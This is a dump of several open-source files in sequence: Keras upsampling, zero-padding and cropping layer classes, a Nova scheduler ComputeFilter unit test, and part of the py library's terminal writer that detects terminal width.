Output shape:
3D tensor with shape: `(batch, upsampled_steps, features)`.
"""
def __init__(self, size=2, **kwargs):
super(UpSampling1D, self).__init__(**kwargs)
self.size = int(size)
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
size = self.size * input_shape[1] if input_shape[1] is not None else None
return tensor_shape.TensorShape([input_shape[0], size, input_shape[2]])
def call(self, inputs):
output = K.repeat_elements(inputs, self.size, axis=1)
return output
def get_config(self):
config = {'size': self.size}
base_config = super(UpSampling1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class UpSampling2D(Layer):
"""Upsampling layer for 2D inputs.
Repeats the rows and columns of the data
by size[0] and size[1] respectively.
Arguments:
size: int, or tuple of 2 integers.
The upsampling factors for rows and columns.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, rows, cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, rows, cols)`
Output shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, upsampled_rows, upsampled_cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, upsampled_rows, upsampled_cols)`
"""
def __init__(self, size=(2, 2), data_format=None, **kwargs):
super(UpSampling2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
self.size = conv_utils.normalize_tuple(size, 2, 'size')
self.input_spec = InputSpec(ndim=4)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
height = self.size[0] * input_shape[
2] if input_shape[2] is not None else None
width = self.size[1] * input_shape[
3] if input_shape[3] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], height, width])
else:
height = self.size[0] * input_shape[
1] if input_shape[1] is not None else None
width = self.size[1] * input_shape[
2] if input_shape[2] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], height, width, input_shape[3]])
def call(self, inputs):
return K.resize_images(inputs, self.size[0], self.size[1], self.data_format)
def get_config(self):
config = {'size': self.size, 'data_format': self.data_format}
base_config = super(UpSampling2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
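# A hedged usage sketch: UpSampling2D just repeats rows and columns, so it
# has no trainable weights; (None, 14, 14, 3) becomes (None, 28, 28, 3):
#
#   import tensorflow as tf
#   model = tf.keras.models.Sequential([
#       tf.keras.layers.UpSampling2D(size=(2, 2), input_shape=(14, 14, 3)),
#   ])
#   model.output_shape  # (None, 28, 28, 3)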
class UpSampling3D(Layer):
"""Upsampling layer for 3D inputs.
Repeats the 1st, 2nd and 3rd dimensions
of the data by size[0], size[1] and size[2] respectively.
Arguments:
size: int, or tuple of 3 integers.
The upsampling factors for dim1, dim2 and dim3.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, dim1, dim2, dim3, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, dim1, dim2, dim3)`
Output shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, upsampled_dim1, upsampled_dim2, upsampled_dim3, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, upsampled_dim1, upsampled_dim2, upsampled_dim3)`
"""
def __init__(self, size=(2, 2, 2), data_format=None, **kwargs):
self.data_format = conv_utils.normalize_data_format(data_format)
self.size = conv_utils.normalize_tuple(size, 3, 'size')
self.input_spec = InputSpec(ndim=5)
super(UpSampling3D, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
dim1 = self.size[0] * input_shape[
2] if input_shape[2] is not None else None
dim2 = self.size[1] * input_shape[
3] if input_shape[3] is not None else None
dim3 = self.size[2] * input_shape[
4] if input_shape[4] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], dim1, dim2, dim3])
else:
dim1 = self.size[0] * input_shape[
1] if input_shape[1] is not None else None
dim2 = self.size[1] * input_shape[
2] if input_shape[2] is not None else None
dim3 = self.size[2] * input_shape[
3] if input_shape[3] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], dim1, dim2, dim3, input_shape[4]])
def call(self, inputs):
return K.resize_volumes(inputs, self.size[0], self.size[1], self.size[2],
self.data_format)
def get_config(self):
config = {'size': self.size, 'data_format': self.data_format}
base_config = super(UpSampling3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ZeroPadding1D(Layer):
"""Zero-padding layer for 1D input (e.g. temporal sequence).
Arguments:
    padding: int, or tuple of int (length 2).
- If int:
How many zeros to add at the beginning and end of
the padding dimension (axis 1).
- If tuple of int (length 2):
How many zeros to add at the beginning and at the end of
the padding dimension (`(left_pad, right_pad)`).
Input shape:
3D tensor with shape `(batch, axis_to_pad, features)`
Output shape:
3D tensor with shape `(batch, padded_axis, features)`
"""
def __init__(self, padding=1, **kwargs):
super(ZeroPadding1D, self).__init__(**kwargs)
self.padding = conv_utils.normalize_tuple(padding, 2, 'padding')
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
if input_shape[1] is not None:
length = input_shape[1] + self.padding[0] + self.padding[1]
else:
length = None
return tensor_shape.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
return K.temporal_padding(inputs, padding=self.padding)
def get_config(self):
config = {'padding': self.padding}
base_config = super(ZeroPadding1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ZeroPadding2D(Layer):
"""Zero-padding layer for 2D input (e.g. picture).
This layer can add rows and columns of zeros
at the top, bottom, left and right side of an image tensor.
Arguments:
padding: int, or tuple of 2 ints, or tuple of 2 tuples of 2 ints.
- If int: the same symmetric padding
is applied to width and height.
- If tuple of 2 ints:
interpreted as two different
symmetric padding values for height and width:
`(symmetric_height_pad, symmetric_width_pad)`.
- If tuple of 2 tuples of 2 ints:
interpreted as
`((top_pad, bottom_pad), (left_pad, right_pad))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, rows, cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, rows, cols)`
Output shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, padded_rows, padded_cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, padded_rows, padded_cols)`
"""
def __init__(self, padding=(1, 1), data_format=None, **kwargs):
super(ZeroPadding2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(padding, int):
self.padding = ((padding, padding), (padding, padding))
elif hasattr(padding, '__len__'):
if len(padding) != 2:
raise ValueError('`padding` should have two elements. '
'Found: ' + str(padding))
height_padding = conv_utils.normalize_tuple(padding[0], 2,
'1st entry of padding')
width_padding = conv_utils.normalize_tuple(padding[1], 2,
'2nd entry of padding')
self.padding = (height_padding, width_padding)
else:
raise ValueError('`padding` should be either an int, '
'a tuple of 2 ints '
'(symmetric_height_pad, symmetric_width_pad), '
'or a tuple of 2 tuples of 2 ints '
'((top_pad, bottom_pad), (left_pad, right_pad)). '
'Found: ' + str(padding))
self.input_spec = InputSpec(ndim=4)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
if input_shape[2] is not None:
rows = input_shape[2] + self.padding[0][0] + self.padding[0][1]
else:
rows = None
if input_shape[3] is not None:
cols = input_shape[3] + self.padding[1][0] + self.padding[1][1]
else:
cols = None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], rows, cols])
elif self.data_format == 'channels_last':
if input_shape[1] is not None:
rows = input_shape[1] + self.padding[0][0] + self.padding[0][1]
else:
rows = None
if input_shape[2] is not None:
cols = input_shape[2] + self.padding[1][0] + self.padding[1][1]
else:
cols = None
return tensor_shape.TensorShape(
[input_shape[0], rows, cols, input_shape[3]])
def call(self, inputs):
return K.spatial_2d_padding(
inputs, padding=self.padding, data_format=self.data_format)
def get_config(self):
config = {'padding': self.padding, 'data_format': self.data_format}
base_config = super(ZeroPadding2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
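# A hedged usage sketch: the tuple-of-tuples form pads asymmetrically;
# ((1, 2), (3, 4)) adds 1 + 2 rows and 3 + 4 columns, so 10x10 becomes
# 13x17:
#
#   import tensorflow as tf
#   model = tf.keras.models.Sequential([
#       tf.keras.layers.ZeroPadding2D(padding=((1, 2), (3, 4)),
#                                     input_shape=(10, 10, 3)),
#   ])
#   model.output_shape  # (None, 13, 17, 3)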
class ZeroPadding3D(Layer):
"""Zero-padding layer for 3D data (spatial or spatio-temporal).
Arguments:
    padding: int, or tuple of 3 ints, or tuple of 3 tuples of 2 ints.
        - If int: the same symmetric padding
            is applied to all three spatial dimensions.
        - If tuple of 3 ints:
            interpreted as three different
            symmetric padding values for dim1, dim2 and dim3:
            `(symmetric_dim1_pad, symmetric_dim2_pad, symmetric_dim3_pad)`.
        - If tuple of 3 tuples of 2 ints:
interpreted as
`((left_dim1_pad, right_dim1_pad), (left_dim2_pad,
right_dim2_pad), (left_dim3_pad, right_dim3_pad))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_axis_to_pad, second_axis_to_pad, third_axis_to_pad,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_axis_to_pad, second_axis_to_pad,
third_axis_to_pad)`
Output shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
      `(batch, first_padded_axis, second_padded_axis, third_padded_axis,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_padded_axis, second_padded_axis,
          third_padded_axis)`
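  Examples:
      A minimal sketch under the same illustrative assumptions as the
      other examples in this module:
  ```python
  model = Sequential()  # illustrative: from keras.models import Sequential
  model.add(ZeroPadding3D(padding=2, input_shape=(10, 10, 10, 3)))
  # two planes of zeros on each side of every spatial axis
  # now model.output_shape == (None, 14, 14, 14, 3)
  ```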
"""
def __init__(self, padding=(1, 1, 1), data_format=None, **kwargs):
super(ZeroPadding3D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(padding, int):
self.padding = ((padding, padding), (padding, padding), (padding,
padding))
elif hasattr(padding, '__len__'):
if len(padding) != 3:
raise ValueError('`padding` should have 3 elements. '
'Found: ' + str(padding))
dim1_padding = conv_utils.normalize_tuple(padding[0], 2,
'1st entry of padding')
dim2_padding = conv_utils.normalize_tuple(padding[1], 2,
'2nd entry of padding')
dim3_padding = conv_utils.normalize_tuple(padding[2], 2,
'3rd entry of padding')
self.padding = (dim1_padding, dim2_padding, dim3_padding)
else:
raise ValueError(
'`padding` should be either an int, '
'a tuple of 3 ints '
'(symmetric_dim1_pad, symmetric_dim2_pad, symmetric_dim3_pad), '
'or a tuple of 3 tuples of 2 ints '
'((left_dim1_pad, right_dim1_pad),'
' (left_dim2_pad, right_dim2_pad),'
          ' (left_dim3_pad, right_dim3_pad)). '
'Found: ' + str(padding))
self.input_spec = InputSpec(ndim=5)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
if input_shape[2] is not None:
        dim1 = input_shape[2] + self.padding[0][0] + self.padding[0][1]
else:
dim1 = None
if input_shape[3] is not None:
        dim2 = input_shape[3] + self.padding[1][0] + self.padding[1][1]
else:
dim2 = None
if input_shape[4] is not None:
        dim3 = input_shape[4] + self.padding[2][0] + self.padding[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], dim1, dim2, dim3])
elif self.data_format == 'channels_last':
if input_shape[1] is not None:
        dim1 = input_shape[1] + self.padding[0][0] + self.padding[0][1]
else:
dim1 = None
if input_shape[2] is not None:
        dim2 = input_shape[2] + self.padding[1][0] + self.padding[1][1]
else:
dim2 = None
if input_shape[3] is not None:
        dim3 = input_shape[3] + self.padding[2][0] + self.padding[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], dim1, dim2, dim3, input_shape[4]])
def call(self, inputs):
return K.spatial_3d_padding(
inputs, padding=self.padding, data_format=self.data_format)
def get_config(self):
config = {'padding': self.padding, 'data_format': self.data_format}
base_config = super(ZeroPadding3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Cropping1D(Layer):
"""Cropping layer for 1D input (e.g. temporal sequence).
It crops along the time dimension (axis 1).
Arguments:
cropping: int or tuple of int (length 2)
How many units should be trimmed off at the beginning and end of
the cropping dimension (axis 1).
If a single int is provided,
the same value will be used for both.
Input shape:
3D tensor with shape `(batch, axis_to_crop, features)`
Output shape:
3D tensor with shape `(batch, cropped_axis, features)`
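  Examples:
      A minimal sketch (illustrative shapes and `Sequential` API):
  ```python
  model = Sequential()  # illustrative: from keras.models import Sequential
  model.add(Cropping1D(cropping=(1, 2), input_shape=(10, 8)))
  # trims 1 step from the start and 2 steps from the end of axis 1
  # now model.output_shape == (None, 7, 8)
  ```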
"""
def __init__(self, cropping=(1, 1), **kwargs):
super(Cropping1D, self).__init__(**kwargs)
self.cropping = conv_utils.normalize_tuple(cropping, 2, 'cropping')
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if input_shape[1] is not None:
length = input_shape[1] - self.cropping[0] - self.cropping[1]
else:
length = None
return tensor_shape.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
if self.cropping[1] == 0:
return inputs[:, self.cropping[0]:, :]
else:
return inputs[:, self.cropping[0]:-self.cropping[1], :]
def get_config(self):
config = {'cropping': self.cropping}
base_config = super(Cropping1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Cropping2D(Layer):
"""Cropping layer for 2D input (e.g. picture).
It crops along spatial dimensions, i.e. width and height.
Arguments:
cropping: int, or tuple of 2 ints, or tuple of 2 tuples of 2 ints.
- If int: the same symmetric cropping
is applied to width and height.
- If tuple of 2 ints:
interpreted as two different
symmetric cropping values for height and width:
`(symmetric_height_crop, symmetric_width_crop)`.
- If tuple of 2 tuples of 2 ints:
interpreted as
`((top_crop, bottom_crop), (left_crop, right_crop))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, rows, cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, rows, cols)`
Output shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, cropped_rows, cropped_cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, cropped_rows, cropped_cols)`
Examples:
```python
# Crop the input 2D images or feature maps
model = Sequential()
model.add(Cropping2D(cropping=((2, 2), (4, 4)),
input_shape=(28, 28, 3)))
# now model.output_shape == (None, 24, 20, 3)
  model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Cropping2D(cropping=((2, 2), (2, 2))))
  # now model.output_shape == (None, 20, 16, 64)
```
"""
def __init__(self, cropping=((0, 0), (0, 0)), data_format=None, **kwargs):
super(Cropping2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(cropping, int):
self.cropping = ((cropping, cropping), (cropping, cropping))
elif hasattr(cropping, '__len__'):
if len(cropping) != 2:
raise ValueError('`cropping` should have two elements. '
'Found: ' + str(cropping))
height_cropping = conv_utils.normalize_tuple(cropping[0], 2,
'1st entry of cropping')
width_cropping = conv_utils.normalize_tuple(cropping[1], 2,
'2nd entry of cropping')
self.cropping = (height_cropping, width_cropping)
else:
raise ValueError('`cropping` should be either an int, '
'a tuple of 2 ints '
'(symmetric_height_crop, symmetric_width_crop), '
'or a tuple of 2 tuples of 2 ints '
'((top_crop, bottom_crop), (left_crop, right_crop)). '
'Found: ' + str(cropping))
self.input_spec = InputSpec(ndim=4)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
# pylint: disable=invalid-unary-operand-type
if self.data_format == 'channels_first':
return tensor_shape.TensorShape([
input_shape[0], input_shape[1],
input_shape[2] - self.cropping[0][0] - self.cropping[0][1]
if input_shape[2] else None,
input_shape[3] - self.cropping[1][0] - self.cropping[1][1]
if input_shape[3] else None
])
else:
return tensor_shape.TensorShape([
input_shape[0],
input_shape[1] - self.cropping[0][0] - self.cropping[0][1]
if input_shape[1] else None,
input_shape[2] - self.cropping[1][0] - self.cropping[1][1]
if input_shape[2] else None, input_shape[3]
])
# pylint: enable=invalid-unary-operand-type
def call(self, inputs):
# pylint: disable=invalid-unary-operand-type
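    # e.g. cropping=((1, 2), (3, 4)) slices inputs[:, :, 1:-2, 3:-4] in
    # channels_first mode; the branches below special-case end-crops of 0
    # because a literal `-0` stop index would produce an empty slice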
if self.data_format == 'channels_first':
if self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:]
elif self.cropping[0][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1]]
elif self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:]
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:-self.cropping[1][1]]
else:
if self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:, :]
elif self.cropping[0][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1], :]
elif self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:, :]
return inputs[:, self.cropping[0][0]:-self.cropping[0][1], self.cropping[
1][0]:-self.cropping[1][1], :] # pylint: disable=invalid-unary-operand-type
# pylint: enable=invalid-unary-operand-type
def get_config(self):
config = {'cropping': self.cropping, 'data_format': self.data_format}
base_config = super(Cropping2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Cropping3D(Layer):
"""Cropping layer for 3D data (e.g.
spatial or spatio-temporal).
Arguments:
    cropping: int, or tuple of 3 ints, or tuple of 3 tuples of 2 ints.
      - If int: the same symmetric cropping
        is applied to depth, height, and width.
      - If tuple of 3 ints:
        interpreted as three different
symmetric cropping values for depth, height, and width:
`(symmetric_dim1_crop, symmetric_dim2_crop, symmetric_dim3_crop)`.
- If tuple of 3 tuples of 2 ints:
interpreted as
`((left_dim1_crop, right_dim1_crop), (left_dim2_crop,
right_dim2_crop), (left_dim3_crop, right_dim3_crop))`
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_axis_to_crop, second_axis_to_crop, third_axis_to_crop,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_axis_to_crop, second_axis_to_crop,
third_axis_to_crop)`
Output shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, first_cropped_axis, second_cropped_axis, third_cropped_axis,
depth)`
- If `data_format` is `"channels_first"`:
`(batch, depth, first_cropped_axis, second_cropped_axis,
third_cropped_axis)`
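  Examples:
      A minimal sketch (illustrative shapes and `Sequential` API):
  ```python
  model = Sequential()  # illustrative: from keras.models import Sequential
  model.add(Cropping3D(cropping=((1, 1), (2, 2), (3, 3)),
                       input_shape=(8, 16, 20, 3)))
  # now model.output_shape == (None, 6, 12, 14, 3)
  ```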
"""
def __init__(self,
cropping=((1, 1), (1, 1), (1, 1)),
data_format=None,
**kwargs):
super(Cropping3D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
if isinstance(cropping, int):
self.cropping = ((cropping, cropping), (cropping, cropping), (cropping,
cropping))
elif hasattr(cropping, '__len__'):
if len(cropping) != 3:
raise ValueError('`cropping` should have 3 elements. '
'Found: ' + str(cropping))
dim1_cropping = conv_utils.normalize_tuple(cropping[0], 2,
'1st entry of cropping')
dim2_cropping = conv_utils.normalize_tuple(cropping[1], 2,
'2nd entry of cropping')
dim3_cropping = conv_utils.normalize_tuple(cropping[2], 2,
'3rd entry of cropping')
self.cropping = (dim1_cropping, dim2_cropping, dim3_cropping)
else:
raise ValueError(
'`cropping` should be either an int, '
'a tuple of 3 ints '
'(symmetric_dim1_crop, symmetric_dim2_crop, symmetric_dim3_crop), '
'or a tuple of 3 tuples of 2 ints '
'((left_dim1_crop, right_dim1_crop),'
' (left_dim2_crop, right_dim2_crop),'
          ' (left_dim3_crop, right_dim3_crop)). '
'Found: ' + str(cropping))
self.input_spec = InputSpec(ndim=5)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
# pylint: disable=invalid-unary-operand-type
if self.data_format == 'channels_first':
if input_shape[2] is not None:
dim1 = input_shape[2] - self.cropping[0][0] - self.cropping[0][1]
else:
dim1 = None
if input_shape[3] is not None:
dim2 = input_shape[3] - self.cropping[1][0] - self.cropping[1][1]
else:
dim2 = None
if input_shape[4] is not None:
dim3 = input_shape[4] - self.cropping[2][0] - self.cropping[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], dim1, dim2, dim3])
elif self.data_format == 'channels_last':
if input_shape[1] is not None:
dim1 = input_shape[1] - self.cropping[0][0] - self.cropping[0][1]
else:
dim1 = None
if input_shape[2] is not None:
dim2 = input_shape[2] - self.cropping[1][0] - self.cropping[1][1]
else:
dim2 = None
if input_shape[3] is not None:
dim3 = input_shape[3] - self.cropping[2][0] - self.cropping[2][1]
else:
dim3 = None
return tensor_shape.TensorShape(
[input_shape[0], dim1, dim2, dim3, input_shape[4]])
# pylint: enable=invalid-unary-operand-type
def call(self, inputs):
# pylint: disable=invalid-unary-operand-type
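    # same zero-end-crop special-casing as in Cropping2D.call, extended to
    # three spatial axes (eight slicing branches per data format)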
if self.data_format == 'channels_first':
if self.cropping[0][1] == self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:]
elif self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:-self.cropping[2][1]]
elif self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:, self.cropping[2][0]:]
elif self.cropping[0][1] == self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1], self.cropping[2][0]:]
elif self.cropping[0][1] == 0:
return inputs[:, :, self.cropping[0][0]:, self.cropping[1][
0]:-self.cropping[1][1], self.cropping[2][0]:-self.cropping[2][1]]
elif self.cropping[1][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1], self.
cropping[1][0]:, self.cropping[2][0]:-self.cropping[2][1]]
elif self.cropping[2][1] == 0:
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1], self.
cropping[1][0]:-self.cropping[1][1], self.cropping[2][0]:]
return inputs[:, :, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:-self.cropping[1][1], self.cropping[2][
0]:-self.cropping[2][1]]
else:
if self.cropping[0][1] == self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:, :]
elif self.cropping[0][1] == self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:,
self.cropping[2][0]:-self.cropping[2][1], :]
elif self.cropping[1][1] == self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:, self.cropping[2][0]:, :]
elif self.cropping[0][1] == self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][0]:
-self.cropping[1][1], self.cropping[2][0]:, :]
elif self.cropping[0][1] == 0:
return inputs[:, self.cropping[0][0]:, self.cropping[1][
0]:-self.cropping[1][1], self.cropping[2][0]:
-self.cropping[2][1], :]
elif self.cropping[1][1] == 0:
return inputs[:, self.cropping[0][
0]:-self.cropping[0][1], self.cropping[1][0]:, self.cropping[2][0]:
-self.cropping[2][1], :]
elif self.cropping[2][1] == 0:
return inputs[:, self.cropping[0][0]:-self.cropping[0][1],
self.cropping[1][0]:-self.cropping[1][1], self.cropping[
2][0]:, :]
return inputs[:, self.cropping[0][0]:-self.cropping[0][1], self.cropping[
1][0]:-self.cropping[1][1], self.cropping[2][0]: # pylint: disable=invalid-unary-operand-type
-self.cropping[2][1], :] # pylint: disable=invalid-unary-operand-type
# pylint: enable=invalid-unary-operand-type
def get_config(self):
config = {'cropping': self.cropping, 'data_format': self.data_format}
base_config = super(Cropping3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
# Aliases
Convolution1D = Conv1D
Convolution2D = Conv2D
Convolution3D = Conv3D
SeparableConvolution2D = SeparableConv2D
Convolution2DTranspose = Conv2DTranspose
Convolution3DTranspose = Conv3DTranspose
Deconvolution2D = Deconv2D = Conv2DTranspose
Deconvolution3D = Deconv3D = Conv3DTranspose
| apache-2.0 |
JioCloud/nova_test_latest | nova/tests/unit/scheduler/filters/test_compute_filters.py | 68 | 2286 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import compute_filter
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.servicegroup.API.service_is_up')
class TestComputeFilter(test.NoDBTestCase):
def test_compute_filter_manual_disable(self, service_up_mock):
filt_cls = compute_filter.ComputeFilter()
filter_properties = {'instance_type': {'memory_mb': 1024}}
service = {'disabled': True}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024, 'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
self.assertFalse(service_up_mock.called)
def test_compute_filter_sgapi_passes(self, service_up_mock):
filt_cls = compute_filter.ComputeFilter()
filter_properties = {'instance_type': {'memory_mb': 1024}}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024, 'service': service})
service_up_mock.return_value = True
self.assertTrue(filt_cls.host_passes(host, filter_properties))
service_up_mock.assert_called_once_with(service)
def test_compute_filter_sgapi_fails(self, service_up_mock):
filt_cls = compute_filter.ComputeFilter()
filter_properties = {'instance_type': {'memory_mb': 1024}}
service = {'disabled': False, 'updated_at': 'now'}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024, 'service': service})
service_up_mock.return_value = False
self.assertFalse(filt_cls.host_passes(host, filter_properties))
service_up_mock.assert_called_once_with(service)
| apache-2.0 |
sliz1/servo | tests/wpt/web-platform-tests/tools/py/py/_io/terminalwriter.py | 175 | 12542 | """
Helper functions for writing to terminals and files.
"""
import sys, os
import py
py3k = sys.version_info[0] >= 3
from py.builtin import text, bytes
win32_and_ctypes = False
colorama = None
if sys.platform == "win32":
try:
import colorama
except ImportError:
try:
import ctypes
win32_and_ctypes = True
except ImportError:
pass
def _getdimensions():
import termios,fcntl,struct
call = fcntl.ioctl(1,termios.TIOCGWINSZ,"\000"*8)
height,width = struct.unpack( "hhhh", call ) [:2]
return height, width
def get_terminal_width():
height = width = 0
try:
height, width = _getdimensions()
except py.builtin._sysex:
raise
except:
# pass to fallback below
pass
if width == 0:
# FALLBACK:
# * some exception happened
# * or this is emacs terminal which reports (0,0)
width = int(os.environ.get('COLUMNS', 80))
    # XXX the windows getdimensions may be bogus, let's sanity-check it a bit
if width < 40:
width = 80
return width
